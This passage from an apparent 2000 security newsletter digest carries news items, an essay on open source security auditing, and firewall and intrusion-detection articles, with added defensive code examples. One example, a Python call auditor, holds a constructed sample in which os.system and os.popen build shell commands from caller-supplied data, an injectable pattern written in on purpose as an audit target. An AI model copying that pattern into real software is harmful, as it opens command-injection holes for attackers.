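        # Subshell: the umask change does not leak into the caller.
        src_root=$1
        dest=$2
        umask 077                        # new files 0600, new dirs 0700
        mkdir -p "$dest" || exit 1
        chmod 700 "$dest" || exit 1      # tighten a pre-existing directory

        # Stage inside DEST rather than the current directory. The archive
        # is never readable by other users while tar is writing it, and the
        # mv below is a rename on one filesystem, so a half-written file
        # never appears under its final name.
        stage=$(mktemp -d "$dest/.stage.XXXXXX") || exit 1

        for dir in "$src_root"/*; do
            [ -d "$dir" ] || continue
            name=$(basename "$dir")
            if ! tar -czf "$stage/$name.tar.gz" -C "$src_root" "./$name" ||
               ! mv -- "$stage/$name.tar.gz" "$dest/$name.tar.gz"; then
                rm -rf "$stage"
                exit 1
            fi
        done
        rmdir "$stage"
    )
}

# readable_archives DIR
# Prints every .tar.gz under DIR that group or others can read, which is
# the exposure the original loop creates under a permissive umask.
readable_archives() {
    find "$1" -type f -name '*.tar.gz' \( -perm -040 -o -perm -004 \) -print
}

# Stand-alone use: sh backup.sh /home /verysecuredirectory/backups
if [ "$#" -eq 2 ]; then
    backup_homes "$1" "$2" && readable_archives "$2"
fi
```

Running readable_archives over the directories where root normally works is a quick audit for archives an earlier run of the original loop left behind.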
@HWA
196.0 [HNS] May 31: MISSING FILES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:32 PM
Auckland software developer, Phil Saleh, who found a security flaw in
MS Outlook that he believes could secretly unleash a "hell virus",
says files on his discovery have been stolen from his computer.
Link: NZ Herald
http://www.nzherald.co.nz/storydisplay.cfm?storyID
Real story at this url was abducted by aliens.
@HWA
197.0 [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:32 PM
An author of the open source Mailman program explains why open source
is not as secure as you might think - using security holes in his own
code as an example.
Link: Developer.com
http://developer.earthweb.com/journal/techfocus/052600_security.html
May 26, 2000
The Myth of Open Source Security
by John Viega
An author of the open source Mailman program explains why open source is
not as secure as you might think - using security holes in his own code as
an example.
Open source software projects can be more secure than closed source
projects. However, the very things that can make open source programs
secure - the availability of the source code, and the fact that large
numbers of users are available to look for and fix security holes - can
also lull people into a false sense of security.
Many eyeballs
The core open source phenomenon responsible for making code secure is the
"many eyeballs" effect. With lots of people scrutinizing a program's
source code, bugs - and security problems - are more likely to be found.
Why do programmers look at source code? Mostly for their own benefit:
they've found a piece of open source software useful, and they want to
improve or change it for their own specific needs. Sometimes too, source
code attracts scrutiny just to make sure it meets certain needs, even when
there's no intention of modifying it. Companies which require a high level
of security, for example, might do a code review as part of a security
audit. This could be done for any software product where the source is
available, of course, regardless of whether it's open source or produced
commercially.
--------------------------------------------------------------------------------
Everyone using Mailman, apparently, assumed that someone else had done the
proper security auditing.
--------------------------------------------------------------------------------
Source code can also attract programmers' eyeballs simply for reasons of
personal gain. Some people may explicitly wish to find security problems
in the code. Perhaps they want to build a name for themselves in the
security community. Maybe they're motivated by altruism or a belief that
others should be aware of security holes. Earlier this month, for example,
two hackers broke into the open source Apache Software Foundation Web
site, posted a Microsoft logo on it, and then published an explanation of
how an improperly configured Apache server allowed them access. Many
others share information about security vulnerabilities in less intrusive
ways, such as posting to discussions on the Bugtraq mailing list. And,
unfortunately, there will probably always be some people scrutinizing
source code because they want an attack that no one else has - in which
case, you're not likely to gain much from their eyeballs.
Eyes that look do not always see
With people motivated to look at
the source code for any number of reasons, it's easy to assume that open
source software is likely to have been carefully scrutinized, and that
it's secure as a result. Unfortunately, that's not necessarily true.
Lots of things can discourage people from reviewing source code. One
obvious deterrent: if the code looks like a big tangled mess, you'll get
fewer eyeballs on it. And as we discovered while writing Mailman, the GNU
mailing list manager, anything that makes it harder for the average open
source user to hack means fewer eyeballs. We wrote Mailman in Python,
which is nowhere near as popular as C, and often heard from people who
would have liked to help with the development, but did not want to have to
learn Python to do it.
People using open source programs are most likely to look at the source
code when they notice something they'd like to change. Unfortunately, that
doesn't mean the program gets free security audits by people good at such
things. It gets eyeballs looking at the parts of the code they want to
change. Often, that's only a small part of the code. What's more,
programmers preoccupied with adding a feature generally aren't thinking
much about security when they're looking at the code.
And, unfortunately, software developers sometimes have a tendency to
ignore security up front and try to bolt it on afterwards. Even worse,
most developers don't necessarily know much about security. Many
programmers know a bit about buffer overflows, and are probably aware of a
handful of functions that should be avoided. But many of them don't
understand buffer overflows enough to avoid problems beyond the handful of
dangerous calls they know. And when it comes to flaws other than buffer
overflows, the problem gets worse. For example, it is common for
developers to use cryptography, but misapply it in ways that destroy the
security of a system, and it is also common for developers to add subtle
information leaks to their programs accidentally. It's really common to use
encryption that is too weak and can easily be broken. It's also common for
people to exchange cryptography keys in a way that's actually insecure.
People often try to hand roll their own protocols using common
cryptographic primitives. But cryptographic protocols are generally more
complex than one would expect, and are easy to get wrong.
Far too trusting
So despite the conventional wisdom, the fact that
many eyeballs are looking at a piece of software is not likely to make it
more secure. It is likely, however, to make people believe that it is
secure. The result is an open source community that is probably far too
trusting when it comes to security.
Take the case of the open source mailing list manager Mailman, which I
helped write. Mailman is in use running mailing lists at an impressive
number of sites. For three years, until March 2000, Mailman had a handful
of glaring security problems in code that I wrote before I knew much about
security. An attacker could use these security holes to gain access to the
operating system on Linux computers running the program.
These were not obscure bugs: anyone armed with the Unix command grep and
an iota of security knowledge could have found them in seconds. Even
though Mailman was downloaded and installed thousands of times during that
time period, no one reported a thing. I finally realized there were
problems as I started to learn more about security. Everyone using
Mailman, apparently, assumed that someone else had done the proper
security auditing, when, in fact, no one had.
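What a grep-level audit of a Python code base can look like, as an added example that is not from the article or from Mailman. The article does not name the flawed calls, so the call list and the sample source below are assumptions constructed for illustration.

```python
import ast

# Assumption: the article does not say which calls were at fault. This list
# of shell- and code-executing callables is chosen for illustration only.
RISKY_CALLS = {
    "os.system": "argument is run by /bin/sh",
    "os.popen": "argument is run by /bin/sh",
    "eval": "argument is evaluated as Python code",
    "exec": "argument is executed as Python code",
}

# Constructed sample source. It is not Mailman code.
SAMPLE = '''\
import os

def rotate_logs():
    os.system("/usr/sbin/logrotate /etc/logrotate.conf")

def notify(address, path):
    os.system("/usr/lib/sendmail %s < %s" % (address, path))

def list_members(listname):
    return os.popen("ls /var/lists/" + listname).read()

def subscribe(members, address):
    members.append(address)
'''


def dotted_name(node):
    """Return 'os.system' for an attribute chain, 'eval' for a bare name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. a method called on the result of another call


def is_constant_string(node):
    """True only when the argument is a literal with nothing spliced in."""
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def audit(source, filename="<constructed>"):
    """Return (line, call, severity, reason) tuples sorted by line number."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        if name not in RISKY_CALLS:
            continue
        first = node.args[0] if node.args else None
        if first is not None and is_constant_string(first):
            severity = "review"  # fixed command text: the hit grep also gives
        else:
            severity = "high"    # command text is assembled at run time
        findings.append((node.lineno, name, severity, RISKY_CALLS[name]))
    return sorted(findings)


def report(findings):
    """Format findings one per line for a reviewer."""
    return ["line %d: %s [%s] %s" % f for f in findings]


if __name__ == "__main__":
    print("\n".join(report(audit(SAMPLE))))
```

The "review" versus "high" split is the part plain grep cannot do: it separates a fixed command from one built out of data the caller supplies.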
And if three years seems like a long time for security holes to go
undetected, consider the case of Kerberos, an Open Source security
protocol for doing authentication. According to Ken Raeburn, one of the
developers of the MIT Kerberos implementation, some of the buffer
overflows recently found in that package have been there for over ten
years.
The many eyeballs approach clearly failed for Mailman. And as open source
programs are increasingly packaged and sold as products, users -
particularly those who are not familiar with the open source world - may
well assume that the vendor they are buying the product from has done some
sort of security check on it.
Until this week, for example, version 1.0 of Mailman, which contains these
security holes, was included in Red Hat Professional Linux version 6.2.
(If you're running a Mailman version earlier than 2.0 beta, allow me to
suggest that you upgrade immediately. The latest version can be found on
the Mailman Web site at http://www.list.org).
Security: tougher than it looks
Even if you get the right kind of people doing the right kinds of
things, you may have problems that you never hear about. Security problems
are often incredibly subtle, and may span large parts of a source tree. It
is not uncommon to have two or three features spread throughout a program,
none of which constitutes a security problem alone, but which can be used
together to perform a security breach. For example, two buffer overflows
recently found in Kerberos version 5 could only be exploited when used in
conjunction with each other.
As a result, doing security reviews of source code tends to be complex and
boring, since you generally have to look at a lot of code, and understand
it pretty well. Even many experts don't like to do these kinds of reviews.
And even the experts can miss things. Consider the case of the popular
open source FTP server wu-ftpd. In the past two years, several very subtle
buffer overflow problems have been found in the code. Almost all of these
problems had been in the code for years, despite the fact that the program
had been examined many times by both hackers and security auditors. If any
of them had discovered the problems, they didn't announce it publicly. In
fact, the wu-ftpd has been used as a case study for vulnerability
detection techniques that never identified these problems as definite
flaws. One tool was able to identify one of the problems as potentially
exploitable, but researchers examined the code thoroughly for a couple of
days, and came to the conclusion that there was no way that the problem
identified by their tool could actually be exploited. Over a year later,
they learned that they were wrong, when an expert audit finally did turn
up the problem.
In code with any reasonable complexity, it can be very difficult to find
bugs. The wu-ftpd is less than 8000 lines of code long, but it was easy
for several bugs to remain hidden in that small space over long periods of
time.
To compound the problem, even when people know about security holes, they
may not get fixed, at least not right away. Even when identified, the
security problems in Mailman took many months to fix, because security was
not the core development team's most immediate concern. In fact, the
team believes one problem still persists in the code, but only in a
configuration that we suspect doesn't get used.
An army in my belly
The single most pernicious problem in computer
security today is the buffer overflow. While the availability of source
code has clearly reduced the number of buffer overflow problems in open
source programs, according to several sources, including CERT, buffer
overflows still account for at least a quarter of all security advisories,
year after year.
Open source proponents sometimes claim that the "many eyeballs" phenomenon
prevents Trojan horses from being introduced in open source software. The
speed with which the TCP wrappers Trojan was discovered in early 1999 is
sometimes cited as supporting evidence. This too can lull the open source
movement into a false sense of security, however, since the TCP wrappers
Trojan is not a good example of a truly stealthy Trojan horse: the code
was glaringly out of place and obviously put there for malicious purposes
only. It was as if the original Trojan horse had been wheeled into Troy
with a sign attached that said, "I've got an army in my belly!"
Well-crafted Trojans are quite different. They generally look like
ordinary bugs with security implications, and are very subtle. Take, for
example, wu-ftpd. Who is to say that one of the buffer overflows that have
been found recently was not a Trojan horse introduced years ago when the
distribution site was hacked?
The open source movement hasn't made the problem of buffer overflows go
away. But eventually, newer programming languages may; unlike C, modern
programming languages like Java or Python never have buffer overflow
problems, because they do automatic bounds checking on array accesses. As
with any technology, fixing the root of the problem is far more effective
than any ad hoc solution.
Is closed source any more secure?
Critics of open source software
might say that providing source code makes the job of the malicious
attacker easier. If only a binary is available, the bar has been raised
high enough to send most such people looking for lower-hanging fruit. But
as the many well-publicized security holes in commercial software make
clear, attackers can find problems without the source code; it just takes
longer. From a security point of view, the advantages of having the source
code available for everyone to see far outweigh any benefit hackers may
gain.
There are many benefits of open source software unrelated to
security. And the "many eyeballs" effect does have the potential to make
open source software more secure than proprietary systems. Currently,
however, the benefits open source provides in terms of security are vastly
overrated, because there isn't as much high-quality auditing as people
believe, and because many security problems are much more difficult to
find than people realize. Open source programs which appeal to a limited
audience are particularly at risk, because of the smaller number of
eyeballs looking at the code. But all open source software is vulnerable,
and the open source movement can only benefit by paying more attention to
security.
Resources
The Mailman web site. http://www.list.org/
The ITS4 security scanner for C code. http://www.rstcorp.com/its4
Software security for developers. http://www.ibm.com/developer/security
CERT web site. http://www.cert.org/
@HWA
198.0 [HNS] May 31:INFORMATION SHARING MECHANISM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:31 PM
The group, known as an "information sharing mechanism," will enable
high technology companies to share data anonymously about software
vulnerabilities and systems attacks.
Link: Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename
Url was eaten by my dog
@HWA
199.0 [HNS] May 31:WAP RELATED DEFACEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:30 PM
It looks like probably the first site created for usage with WAP
(Wireless Application Protocol) was defaced. WAP version of Italian
Wappi web site (http://wap.wappi.com) was changed by De
Meestervervalser. Just a note - It cannot be seen by a normal browser,
but you could see it from Gelon through their emulator.
Link: Site seen with Nokia GSM
Link: Screenshot (21kb)
http://www.gelon.net/cgi-bin/wapalize.cgi?url
http://wap.wappi.com
http://www.net-security.org/misc/wap2805.jpg
@HWA
200.0 [HNS] May 31:RUNNING A BSD-BASED FIREWALL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Wednesday 31 May 2000 on 5:30 PM
Internet security is currently a hot topic. Because of that, many
smaller networks are turning toward firewalls to give them some
protection. Many of these networks do not have the money to pay for a
commercial firewall product, so they are moving to free Unix-based
firewalls such as IP Firewall, IP Filter or IPChains.
Link: BSD Today
http://www.bsdtoday.com/2000/May/Features165.html
Running a BSD-based Firewall
FreeBSD vs. OpenBSD as a firewall platform.
By Jim O'Gorman
Introduction
Internet security is currently a hot topic. Because of that, many smaller
networks are turning toward firewalls to give them some protection. Many
of these networks do not have the money to pay for a commercial firewall
product, so they are moving to free Unix-based firewalls such as IP
Firewall, IP Filter or IPChains.
The company I work for was in a similar situation. I hope to give you some
insight into why we chose the product we did, where we started, what we
learned from the initial installation and also what we've changed to
improve management of the network. I am not going to explain firewall rule
sets at all. That is too large of a topic. For that I would suggest
getting the book "Firewalls and Internet Security" by Cheswick and
Bellovin (ISBN 0201633574) and consulting the documentation of the
firewall product you decide to go with.
Also, in this paper I will state what worked best for us at the time. What
might work best for us in a year may be different. Just like what will
work best for you now may be different from what we chose. Take the
information in this paper, add it to information drawn elsewhere and form
your own conclusion for what will be best for you. Also, keep in mind that
because I may have decided that your favorite OS may not have been best
for me, it is not an insult to you. Don't view OS's as a religion, because
they are only tools. Nothing more. Use the best one for a given job and
let it stay at that.
Commercial Firewalls vs. Open Source Firewalls
The first bridge that we had to cross was getting people to accept an open
source firewall package. Everyone knows and trusts products like
Checkpoint and Cisco's Pix firewall. A firewall is a key part of the
security infrastructure. It is a stretch to ask management to trust a
product they may never have heard of for such an important part of the
network.
When you buy a commercial firewall product, you are not buying a better
quality product, but only paying for a name. That name gives your
management and you confidence that there is a strong, solid company behind
your firewall. With an open source firewall, you do not get that name.
However, you do get the equivalent credibility through the very nature of
open source. Anyone that uses it will be more than happy to tell you the
good and the bad that they have gone through with the product.
The other bonus is that open source firewalls are usually written by
people that are using the product themselves. This gives them every
incentive in the world to make it work right. Plus, with the open source
model you can influence the direction of the program. Darren Reed of IP
Filter has impressed me many times over with his openness to add features
that users have asked for. You do not find that with a bigger commercial
company.
Our Firewall product
I am a BSD guy. That is the platform I know best. With that in mind, there
are two popular free firewalls we could pick from: IP Filter and IP
Firewall. IP Firewall is a fine product that I have used in the past with
success, but at the time it could not keep state. A stateful firewall was
a requirement for this particular project, so we decided to go with IP
Filter (http://coombs.anu.edu.au/~avalon/).
There is a bit of a religious war about stateful vs. non-stateful (packet
filter) firewalls. Don't take my word for which is better. Look through
the book referenced above to see which would work best for you. I prefer
to stay with a stateful firewall, because it allows me to only allow the
initial SYN packet through. Then the firewall will allow the rest of that
TCP session through. This prevents things like stealth scans from getting
through your network.
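The difference described above, modelled on constructed traffic. This is an added example, not code from the article or from IP Filter: the stateless rule set (pass anything to an open port, treat ACK or RST as return traffic) and all addresses are assumptions, and the stateful side models "only a bare SYN may open a session", the behaviour IP Filter expresses with "flags S keep state".

```python
from dataclasses import dataclass

SYN, ACK, FIN, RST = "S", "A", "F", "R"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # TCP flags set on this segment


def pkt(src, sport, dst, dport, flags):
    """Build a packet; flags is a string such as "S" or "FA"."""
    return Packet(src, sport, dst, dport, frozenset(flags))


def stateless_filter(p, open_ports):
    """Judge each segment on its own, with no memory of earlier ones."""
    if p.dport in open_ports:
        return "pass"   # any flag combination reaches the service
    if ACK in p.flags or RST in p.flags:
        return "pass"   # assumed to be a reply to an outbound connection
    return "block"


class StatefulFilter:
    """Only a bare SYN to an open port may create a session entry."""

    def __init__(self, open_ports):
        self.open_ports = set(open_ports)
        self.sessions = set()  # (src, sport, dst, dport) of admitted sessions

    def inbound(self, p):
        key = (p.src, p.sport, p.dst, p.dport)
        if key in self.sessions:
            if RST in p.flags:
                self.sessions.discard(key)  # simplified teardown, no timers
            return "pass"
        if p.dport in self.open_ports and p.flags == frozenset({SYN}):
            self.sessions.add(key)
            return "pass"
        return "block"  # no session and not a valid opener


# Constructed traffic against a web server (documentation address ranges).
WEB = "192.0.2.10"
TRAFFIC = [
    ("client SYN to 80", pkt("198.51.100.7", 40000, WEB, 80, "S")),
    ("client ACK to 80", pkt("198.51.100.7", 40000, WEB, 80, "A")),
    ("FIN probe to 80", pkt("203.0.113.9", 50001, WEB, 80, "F")),
    ("ACK probe to 22", pkt("203.0.113.9", 50002, WEB, 22, "A")),
    ("SYN to closed 22", pkt("203.0.113.9", 50003, WEB, 22, "S")),
    ("client FIN+ACK to 80", pkt("198.51.100.7", 40000, WEB, 80, "FA")),
]


def compare(traffic, open_ports=(80,)):
    """Return (label, stateless verdict, stateful verdict) per packet."""
    stateful = StatefulFilter(open_ports)
    return [
        (label, stateless_filter(p, open_ports), stateful.inbound(p))
        for label, p in traffic
    ]


if __name__ == "__main__":
    for label, stateless, stateful in compare(TRAFFIC):
        print("%-22s stateless=%-5s stateful=%s" % (label, stateless, stateful))
```

Both probes that carry no SYN pass the stateless rules and reach the host, while the stateful filter drops them because no session entry exists for them.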
IP Filter is a nice, small, and efficient firewall that comes with the
base OS of FreeBSD, OpenBSD, and NetBSD. It also runs on Solaris, SunOS,
BSD/OS, Irix, and HP/UX. The cross platform nature of the product was a
big feather in its cap. It would allow us to go with one Unix today,
switch to a different Unix in the future, and still keep the same firewall
product. The next question was: What platform are we going to run this
product on?
Base OS
As previously stated, I am a BSD guy. So we came right out looking at
FreeBSD and OpenBSD. Since this was a smaller installation, I was looking
forward to using an OS which I was not as familiar with. I am more
familiar with FreeBSD, which was a strike against it and gave OpenBSD a
leg up.
The other big issue supporting OpenBSD is the way it is marketed. If you
go to http://www.openbsd.org they will be more than happy to tell you that
they have "Three years without a remote hole in the default install!" and
"Two years without a localhost hole in the default install!". That is very
impressive. You do not go that long without a root exploit by luck. This
shows a focus by the OpenBSD developers to make the default install of
OpenBSD secure. Plus, IP Filter is the default firewall with OpenBSD so it
makes getting up and running with OpenBSD very quick.
With the hard core security that drives the OpenBSD project along with the
chance to work with something new in mind, we decided that OpenBSD would
be a good choice for a BSD-based IP Filter firewall.
Implementation
This is where the fun really is, in setting up the firewall itself. After
the install of OpenBSD, all you have to do is enable IP Filter and plug in
your rule set. The best source of information for setting up IP Filter is
in the OpenBSD FAQ at http://www.openbsd.org/faq/faq6.html. Follow those
instructions and you should be up and going in no time. The only real
thing you should watch is when you write your rule sets. You really have
to understand IP. Otherwise you are very likely to open up a hole in the
network.
Testing
After the firewall is installed and the rules are written, the most
important thing is testing. You cannot set up a firewall, throw it on the
network and assume it works.
Testing the NAT (Network Address Translation) is very easy. Simply plug a
machine on the internal interface and see if it works. SSH into a box on a
remote network, do a "who" and see what IP it says you are coming from.
Really, NAT is kind of nice in the regard that it either works or does
not.
The firewall, however, is a different story. There is really no right way
of testing it. What we did was go through the rule set and double check
all the rules. After that, from a remote network we ran Nessus
(http://www.nessus.org/), Nmap (http://www.insecure.org/nmap/index.html)
and Saint (http://www.wwdsi.com/saint/) against our public IP range. You
may have some different preferred tools to use for this purpose. The key
is to be creative. Try what you would do if you were trying to break into
that network. Use the tools that crackers trying to break in would use.
After you have things looking good, you must remember to test every couple
of months. No firewall is ever done. As new attacks come out, you must
make sure you are defended against them.
Results and Changes
What we found was that the initial install went fine. The firewall was
secure, the NAT worked great, and everyone was happy. Then the time came
when we wanted to upgrade IP Filter to the newest version. That is when we
ran into a bit of trouble. Upgrading was important to us because we wanted
to have access to IP Filter's newest features and bug fixes.
After some searching around, we ran into e-mails such as this one:
http://www.false.net/ipfilter/2000_02/0004.html. The short of them is that
it is not suggested practice to install IP Filter from source on OpenBSD,
and it is doubtful it would even work. Instead, what users are supposed to
do is upgrade OpenBSD to -current, where the maintainer of the IP Filter
section should have the newest version integrated into the source tree.
This was an issue for us. Running -current on any type of production
server, much less something as key as a firewall, is not something that
should be done. For those not familiar with the way BSDs work, -current is
the up-to-when-you-cvsup current snapshot of the source tree of the OS.
There is no guarantee that it will work, be bug free or even compile.
-current is a work in progress for developers to use, and not intended for
production use.
So, in order to upgrade IP Filter on OpenBSD on our production firewalls
we were left with two choices: either run not-yet-ready-for-production
code or to not upgrade at all. Because of the chances of a problem with IP
Filter coming out in the future, we decided to change to FreeBSD. FreeBSD
would allow us to track -stable (a branch of the source tree meant for
production use), and allow us to upgrade IP Filter from source whenever
we felt like it.
The Change
Once you break down what you actually do on a firewall that is maintained
by someone that understands firewalls, many of OpenBSD's strengths don't
matter. Let's give a couple of "for instances" to make sure that my point
is being made clear.
A home user, who may not understand Unix well, may best be served by
running OpenBSD as a firewall platform. The reason for this is that the
home user can do a default OpenBSD install and feel good in the fact that
even if he does not know enough to turn off services, he will be at least
a little protected by the fact there have been no root exploits for quite
some time. True, a box is only as secure as the administrator makes it,
but this type of user is not likely to change much of anything. In which
case, the secure-by-default install will help them. Plus, a user like this
is not likely to want to upgrade their install until the next version
upgrade comes out, so the inflexibility of IP Filter on OpenBSD should not
hurt them.
For a use like ours, however, where the administrator will go over the box
and shut down the services they will never need, and no user logs in on the
firewall, there is not much that OpenBSD will give you. OpenBSD and
FreeBSD both running IP Filter, with SSH as the only other service, will
be equally secure. If there are no other remote services running, there is
no other way into the box.
With no loss in security while gaining the flexibility of being able to
upgrade IP Filter whenever needed, there was no reason not to use FreeBSD.
With those facts in mind, we made the switch from OpenBSD to FreeBSD.
Justification
The upgrade was very simple. Install FreeBSD, install the newest IP
Filter, copy over the rule sets, and we were done. With the rule set
already written, there is really not much else to do.
Shortly after we finished the upgrade, we felt justified for our decision.
In this e-mail, http://false.net/ipfilter/2000_05/0091.html, an IP Filter
user had found a bug that may have been used to exploit an IP Filter
install. If this exploit had been developed then there would have been a
hole in our firewall. If we had still been on OpenBSD, we would have had
to choose between running -current or sticking with the old, buggy,
version of IP Filter.
The Future
The lesson learned here is that you cannot listen to marketing, even open
source marketing. Even though OpenBSD is known as "the secure OS," and a
firewall is an application where you would want the utmost security, the
product marketed towards that niche may not be the best choice for the
application. The best thing to do is ignore the marketing, look at all the
facts, and decide what is best for your install.
Hopefully in the future, there will be an easier way to upgrade IP Filter
under OpenBSD. Even if they make one, I do not see any reason for us to
switch back. Switching back would gain us nothing. We will see what the
future brings, and whether changes in the direction of either BSD project
or of IP Filter affect the way we do things. An important thing about
computers in general is that nothing is static: as new products come out
and existing products change, you have to go with what is best at the time.
More Info
IP Filter - http://coombs.anu.edu.au/~avalon/
IPF(8) Manual Page from FreeBSD - http://www.bsdtoday.com/2000/May/supplement166.html
inetd and inetd.conf: Managing your system's internet switchboard operator - http://www.bsdtoday.com/2000/March/Tutorials19.html
@HWA
201.0 [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 1:09 AM
Five laptop computers worth about $30,000 have been stolen from
Parliament House in what appears to have been an inside job. The
laptops could allow access to the parliamentary network, a Senate
committee heard today.
Link: Australian IT
http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.html
Laptops stolen from Parliament AAP
FIVE laptop computers worth about $30,000 have been stolen from Parliament
House in what appears to have been an inside job.
The laptops could allow hackers access to the parliamentary network, a
Senate committee heard today. They were taken over a short period of
time from secured areas at parliament.
Parliamentary official Robert Alison said the laptops appeared to have
been taken by parliamentary workers or visitors with security clearance.
"It seems strange to me that four or five computers would disappear in a
short time, which says to me that there may be a market for them," Mr
Alison said.
"One of the concerns is that all five of those computers were taken from
what we call the private areas of Parliament House, so presumably the
person or persons who took them was a passholder of some sort."
Mr Alison, the Usher of the Black Rod, said the laptops were protected by
passwords but acknowledged their contents were not 100 per cent safe.
@HWA
202.0 [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:58 AM
More than 45,000 viruses infect PCs running the Windows operating
system worldwide. By contrast, perhaps 35 viruses have been written
for the Macintosh and four or five for the Unix-based computers that
run most Web sites, says Eugene Spafford, director of the Center for
Education and Research in Information Assurance and Security lab at
Purdue University.
Link: USA Today
http://www.usatoday.com/life/cyber/tech/cth950.htm
@HWA
203.0 [HNS] May 24:INTRUSION DETECTION ON LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:54 AM
"This article focuses on several host-based intrusion detection
systems that are available on Linux. In particular, I will cover some
of the basics of installing and setting up these packages, how they are
useful, and in what circumstances they can be used. This article
assumes a basic knowledge of systems security. In particular, I will
assume that the most basic security measures have already been taken
to secure a host against intrusion from the internet."
Link: Security Focus
http://www.securityfocus.com/focus/linux/articles/linux-ids.html
Typical newbie fare, graphic missing from this text version, use link
to ogle the chart. - Ed
Focus On Linux: Intrusion Detection on Linux
by David "Del" Elson
last updated Monday, May 22, 2000
Introduction
This article focuses on several host-based intrusion
detection systems that are available on Linux. In particular, I will
cover some of the basics of installing and setting up these packages, how
they are useful, and in what circumstances they can be used.
Systems Security 101
This article assumes a basic knowledge of
systems security. In particular, I will assume that the most basic
security measures have already been taken to secure a host against
intrusion from the internet. These measures could include:
Firewalling, to ensure that access to the various TCP and UDP ports of
the system that were not intended for internet access are prevented. For
example, a basic set of firewalling rules for a web server would ensure
that the only TCP/IP access to the machine was on TCP port 80, the port
normally used for HTTP access.
Disabling daemons that are not required. For example: A web server
normally needs a process running to serve web pages. Processes that are
not associated with serving web pages, such as RPC/Portmap services, NFS
services, X Font Server, DNS name server, and other extraneous and unused
applications should be stopped or disabled. On a Red Hat Linux system,
this is normally done by using one of the run level editors, for example
ntsysv or tksysv, to disable the startup of any daemon or service that is
not required.
Disabling access to ports that are not required, by editing
/etc/inetd.conf. Typically, a system will come pre-installed with access
to many ports enabled in the /etc/inetd.conf file. Editing this file to
remove or comment out any lines that are not required is the most basic
system security activity and should be carried out on all systems.
Lines of Defence
Illustration 1: Multi Layered Systems Security
In this article, I will discuss a multi-layered approach to systems
security. Several security layers can be used independently to provide
additional protection in case any of the layers should be breached. An
example of a multi-layered security system is shown in illustration 1.
Each layer in the diagram provides additional data protection to the
layers above it. For example, the first layer is the firewall. Should an
intrusion attempt not be defeated by the firewall, a second layer, the
Port Sentry program, can provide additional protection.
Further inside the security system are the LIDS and LogCheck programs,
that provide additional protection should an intrusion attempt not be
intercepted by the Port Sentry program.
Monitoring Incoming Connections
The first layer of protection behind
the firewall is a software package that will monitor incoming attempts to
connect to the machine. The PortSentry package
(http://www.psionic.com/abacus/portsentry/) provides a simple and
effective method of doing this.
What does PortSentry do?
PortSentry is a program that monitors
activity on specific TCP/IP ports. Activity on the ports that are
monitored by PortSentry is reported, and one of several options can be
taken, including denying further attempts to access your system from
the source of the activity. This is an important defence mechanism,
because a hacker will typically probe your system for weaknesses ("port
scanning") before attempting an intrusion. Detecting the probe or port
scan, and completely denying further access to your system by a potential
hacker, robs that hacker of the ability to follow up on any port scans
with a real intrusion attempt.
Installing PortSentry
For users of Red Hat Linux, PortSentry is
available in RPM format on the Red Hat contrib FTP site. This site is
mirrored in various locations around the world; check www.redhat.com
for the location of your nearest mirror. I haven't yet determined the
availability of a .deb format package for PortSentry but I am sure there
is one out there.
For other Linux systems, installing PortSentry from the source code is
relatively simple.
Recommended Configuration
PortSentry runs in a number of modes,
including various TCP and UDP stealth modes. The mechanism that I prefer
to use for running PortSentry is to bind it to a TCP port that (a) is not
in use, and (b) is known in some systems to have potential for intrusion
attempts. For example, port 143 (imap2), port 111 (portmap) and port 23
(telnet) are TCP ports that I do not use on my internet systems, and my
web server was scanned on both of those ports in the last 24 hours.
To start PortSentry in basic TCP mode, ensure that your system start-up
scripts run this command somewhere:
portsentry -tcp
Also, ensure that the PortSentry config file (portsentry.conf) contains a
TCP_PORTS line enabling scanning on the ports that you require.
Response Options
The "Response Options" section of the
portsentry.conf file allows you to specify what response PortSentry
will take on detecting unwanted activity. The mechanism that I normally
choose is to use ipchains to block further access from the source of the
activity. This is done by uncommenting the following line in the
portsentry.conf file:
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
On systems that receive a high level of port scanning activity, removing
the "-l" at the end of the above line will prevent logging of further
incoming connections, which might be useful to save space in the log
files.
Monitoring System Logs
Firewalling systems, and software like
PortSentry perform one useful function, in that they monitor and prevent
connections coming in to unwanted ports on the system. This can prevent
access to a system via a standard scan-and-intrude method.
Where a system is required to run a particular service (eg: Apache on a
web server, or BIND on a DNS server), and a hacker has uncovered a
particular loophole in the service, these programs will unfortunately not
achieve the result of keeping all intruders out of the system. A system
acting as a DNS server that has a vulnerable copy of BIND running on it
will eventually be discovered by a hacker that scans a wide range of
machines for a single port (the DNS port) on each machine, and attempts
intrusion against that port only. The firewall and PortSentry will
unfortunately see this intrusion attempt as a legitimate access to the
system.
LogCheck
LogCheck (http://www.psionic.com/abacus/logcheck/) is a
useful program for scanning system logs for unusual activity. LogCheck
